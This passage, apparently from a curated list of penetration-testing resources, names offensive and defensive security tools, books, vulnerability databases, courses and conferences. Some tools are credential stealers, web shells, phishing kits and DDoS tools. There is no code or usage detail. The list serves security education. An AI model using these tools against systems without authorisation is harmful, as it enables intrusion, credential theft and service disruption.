• Kismet - Wireless network detector, sniffer, and IDS
• Reaver - Brute force attack against Wifi Protected Setup
• Wifite - Automated wireless attack tool
• wifiphisher - Automated phishing attacks against Wi-Fi networks

SSL Analysis Tools

• SSLyze - SSL configuration scanner
• sslstrip - a demonstration of the HTTPS stripping attacks
• sslstrip2 - SSLStrip version to defeat HSTS
• tls_prober - fingerprint a server's SSL/TLS implementation

Web exploitation

• WPScan - Black box WordPress vulnerability scanner
• SQLmap - Automatic SQL injection and database takeover tool
• weevely3 - Weaponized web shell
• Wappalyzer - Wappalyzer uncovers the technologies used on websites
• cms-explorer - CMS Explorer is designed to reveal the the specific modules, plugins, components and themes that various CMS driven web sites are running.
• joomscan - Joomla CMS scanner
• WhatWeb - Website Fingerprinter
• BlindElephant - Web Application Fingerprinter
• fimap - Find, prepare, audit, exploit and even google automatically for LFI/RFI bugs
• Kadabra - Automatic LFI exploiter and scanner
• Kadimus - LFI scan and exploit tool
• liffy - LFI exploitation tool

Hex Editors

• HexEdit.js - Browser-based hex editing
• Hexinator (commercial) - World's finest Hex Editor

Crackers

• John the Ripper - Fast password cracker
• Online MD5 cracker - Online MD5 hash Cracker
• Hashcat - The more fast hash cracker

Windows Utils

• Sysinternals Suite - The Sysinternals Troubleshooting Utilities
• Windows Credentials Editor - security tool to list logon sessions and add, change, list and delete associated credentials
• mimikatz - Credentials extraction tool for Windows OS
• PowerSploit - A PowerShell Post-Exploitation Framework
• Windows Exploit Suggester - Detects potential missing patches on the target
• Responder - A LLMNR, NBT-NS and MDNS poisoner
• Empire - Empire is a pure PowerShell post-exploitation agent
• Fibratus - Tool for exploration and tracing of the Windows kernel

Linux Utils

• Linux Exploit Suggester - Linux Exploit Suggester; based on operating system release number.

DDoS Tools

• LOIC - An open source network stress tool for Windows
• JS LOIC - JavaScript in-browser version of LOIC
• T50 - The more fast network stress tool

Social Engineering Tools

• SET - The Social-Engineer Toolkit from TrustedSec

OSInt Tools

• Maltego - Proprietary software for open source intelligence and forensics, from Paterva.
• theHarvester - E-mail, subdomain and people names harvester
• creepy - A geolocation OSINT tool
• metagoofil - Metadata harvester
• Google Hacking Database - a database of Google dorks; can be used for recon
• Censys - Collects data on hosts and websites through daily ZMap and ZGrab scans
• Shodan - Shodan is the world's first search engine for Internet-connected devices
• ZoomEye - A cyberspace search engine for Internet-connected devices and websites using Xmap and Wmap
• recon-ng - A full-featured Web Reconnaissance framework written in Python
• github-dorks - CLI tool to scan github repos/organizations for potential sensitive information leak

Anonymity Tools

• Tor - The free software for enabling onion routing online anonymity
• I2P - The Invisible Internet Project
• Nipe - Script to redirect all traffic from the machine to the Tor network.

Reverse Engineering Tools

• IDA Pro - A Windows, Linux or Mac OS X hosted multi-processor disassembler and debugger
• IDA Free - The freeware version of IDA v5.0
• WDK/WinDbg - Windows Driver Kit and WinDbg
• OllyDbg - An x86 debugger that emphasizes binary code analysis
• Radare2 - Opensource, crossplatform reverse engineering framework.
• x64_dbg - An open-source x64/x32 debugger for windows.
• Pyew - A Python tool for static malware analysis.
• Bokken - GUI for Pyew Radare2.
• Immunity Debugger - A powerful new way to write exploits and analyze malware
• Evan's Debugger - OllyDbg-like debugger for Linux
• Medusa disassembler - An open source interactive disassembler
• plasma - Interactive disassembler for x86/ARM/MIPS. Generates indented pseudo-code with colored syntax code.

CTF Tools

• Pwntools - CTF framework for use in CTFs

Books

Penetration Testing Books

• The Art of Exploitation by Jon Erickson, 2008
• Metasploit: The Penetration Tester's Guide by David Kennedy et al., 2011
• Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman, 2014
• Rtfm: Red Team Field Manual by Ben Clark, 2014
• The Hacker Playbook by Peter Kim, 2014
• The Basics of Hacking and Penetration Testing by Patrick Engebretson, 2013
• Professional Penetration Testing by Thomas Wilhelm, 2013
• Advanced Penetration Testing for Highly-Secured Environments by Lee Allen, 2012
• Violent Python by TJ O'Connor, 2012
• Fuzzing: Brute Force Vulnerability Discovery by Michael Sutton et al., 2007
• Black Hat Python: Python Programming for Hackers and Pentesters by Justin Seitz, 2014
• Penetration Testing: Procedures & Methodologies by EC-Council, 2010
• Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp, 2010
• Advanced Persistent Threat Hacking: The Art and Science of Hacking Any Organization by Tyler Wrightson, 2014
• Bug Hunter's Diary by Tobias Klein, 2011

Hackers Handbook Series

• The Database Hacker's Handbook, David Litchfield et al., 2005
• The Shellcoders Handbook by Chris Anley et al., 2007
• The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009
• The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011
• iOS Hackers Handbook by Charlie Miller et al., 2012
• Android Hackers Handbook by Joshua J. Drake et al., 2014
• The Browser Hackers Handbook by Wade Alcorn et al., 2014
• The Mobile Application Hackers Handbook by Dominic Chell et al., 2015
• Car Hacker's Handbook by Craig Smith, 2016

Network Analysis Books

• Nmap Network Scanning by Gordon Fyodor Lyon, 2009
• Practical Packet Analysis by Chris Sanders, 2011
• Wireshark Network Analysis by by Laura Chappell & Gerald Combs, 2012
• Network Forensics: Tracking Hackers through Cyberspace by Sherri Davidoff & Jonathan Ham, 2012

Reverse Engineering Books

• Reverse Engineering for Beginners by Dennis Yurichev
• Hacking the Xbox by Andrew Huang, 2003
• The IDA Pro Book by Chris Eagle, 2011
• Practical Reverse Engineering by Bruce Dang et al., 2014
• Gray Hat Hacking The Ethical Hacker's Handbook by Daniel Regalado et al., 2015

Malware Analysis Books

• Practical Malware Analysis by Michael Sikorski & Andrew Honig, 2012
• The Art of Memory Forensics by Michael Hale Ligh et al., 2014
• Malware Analyst's Cookbook and DVD by Michael Hale Ligh et al., 2010

Windows Books

• Windows Internals by Mark Russinovich et al., 2012

Social Engineering Books

• The Art of Deception by Kevin D. Mitnick & William L. Simon, 2002
• The Art of Intrusion by Kevin D. Mitnick & William L. Simon, 2005
• Ghost in the Wires by Kevin D. Mitnick & William L. Simon, 2011
• No Tech Hacking by Johnny Long & Jack Wiles, 2008
• Social Engineering: The Art of Human Hacking by Christopher Hadnagy, 2010
• Unmasking the Social Engineer: The Human Element of Security by Christopher Hadnagy, 2014
• Social Engineering in IT Security: Tools, Tactics, and Techniques by Sharon Conheady, 2014

Lock Picking Books

• Practical Lock Picking by Deviant Ollam, 2012
• Keys to the Kingdom by Deviant Ollam, 2012
• CIA Lock Picking Field Operative Training Manual
• Lock Picking: Detail Overkill by Solomon
• Eddie the Wire books

Vulnerability Databases

• NVD - US National Vulnerability Database
• CERT - US Computer Emergency Readiness Team
• OSVDB - Open Sourced Vulnerability Database
• Bugtraq - Symantec SecurityFocus
• Exploit-DB - Offensive Security Exploit Database
• Fulldisclosure - Full Disclosure Mailing List
• MS Bulletin - Microsoft Security Bulletin
• MS Advisory - Microsoft Security Advisories
• Inj3ct0r - Inj3ct0r Exploit Database
• Packet Storm - Packet Storm Global Security Resource
• SecuriTeam - Securiteam Vulnerability Information
• CXSecurity - CSSecurity Bugtraq List
• Vulnerability Laboratory - Vulnerability Research Laboratory
• ZDI - Zero Day Initiative

Security Courses

• Offensive Security Training - Training from BackTrack/Kali developers
• SANS Security Training - Computer Security Training & Certification
• Open Security Training - Training material for computer security classes
• CTF Field Guide - everything you need to win your next CTF competition
• Cybrary - online IT and Cyber Security training platform

Information Security Conferences

• DEF CON - An annual hacker convention in Las Vegas
• Black Hat - An annual security conference in Las Vegas
• BSides - A framework for organising and holding security conferences
• CCC - An annual meeting of the international hacker scene in Germany
• DerbyCon - An annual hacker conference based in Louisville
• PhreakNIC - A technology conference held annually in middle Tennessee
• ShmooCon - An annual US east coast hacker convention
• CarolinaCon - An infosec conference, held annually in North Carolina
• HOPE - A conference series sponsored by the hacker magazine 2600
• SummerCon - One of the oldest hacker conventions, held during Summer
• Hack.lu - An annual conference held in Luxembourg
• HITB - Deep-knowledge security conference held in Malaysia and The Netherlands
• Troopers - Annual international IT Security event with workshops held in Heidelberg, Germany
• Hack3rCon - An annual US hacker conference
• ThotCon - An annual US hacker conference held in Chicago
• LayerOne - An annual US security conference held every spring in Los Angeles
• DeepSec - Security Conference in Vienna, Austria
• SkyDogCon - A technology conference in Nashville
• SECUINSIDE - Security Conference in Seoul
• DefCamp - Largest Security Conference in Eastern Europe, held anually in Bucharest, Romania
• AppSecUSA - An annual conference organised by OWASP
• BruCON - An annual security conference in Belgium
• Infosecurity Europe - Europe's number one information security event, held in London, UK
• Nullcon - An annual conference in Delhi and Goa, India
• RSA Conference USA - An annual security conference in San Francisco, California, USA
• Swiss Cyber Storm - An annual security conference in Lucerne, Switzerland
• Virus Bulletin Conference - An annual conference going to be held in Denver, USA for 2016
• Ekoparty - Largest Security Conference in Latin America, held annually in Buenos Aires, Argentina
• 44Con - Annual Security Conference held in London
• BalCCon - Balkan Computer Congress, annualy held in Novi Sad, Serbia
• FSec - FSec - Croatian Information Security Gathering in Varaždin, Croatia

Information Security Magazines

• 2600: The Hacker Quarterly - An American publication about technology and computer "underground"
• Phrack Magazine - By far the longest running hacker zine

Awesome Lists

• Kali Linux Tools - List of tools present in Kali Linux
• SecTools - Top 125 Network Security Tools
• C/C++ Programming - One of the main language for open source security tools
• .NET Programming - A software framework for Microsoft Windows platform development
• Shell Scripting - Command-line frameworks, toolkits, guides and gizmos
• Ruby Programming by @dreikanter - The de-facto language for writing exploits
• Ruby Programming by @markets - The de-facto language for writing exploits
• Ruby Programming by @Sdogruyol - The de-facto language for writing exploits
• JavaScript Programming - In-browser development and scripting
• Node.js Programming by @sindresorhus - JavaScript in command-line
• Node.js Programming by @vndmtrx - JavaScript in command-line
• Python tools for penetration testers - Lots of pentesting tools are written in Python
• Python Programming by @svaksha - General Python programming
• Python Programming by @vinta - General Python programming
• Android Security - A collection of android security related resources
• Awesome Awesomness - The List of the Lists
• AppSec - Resources for learning about application security
• CTFs - Capture The Flag frameworks, libraries, etc
• Hacking - Tutorials, tools, and resources
• Honeypots - Honeypots, tools, components, and more
• Infosec - Information security resources for pentesting, forensics, and more
• Malware Analysis - Tools and resources for analysts
• PCAP Tools - Tools for processing network traffic
• Security - Software, libraries, documents, and other resources
• Awesome List - A curated list of awesome lists
• SecLists - Collection of multiple types of lists used during security assessments
• Security Talks - A curated list of security conferences
• OffensiveSecBlog - Tools for Hackers and Pentesters

OffensiveSec 2016

Read More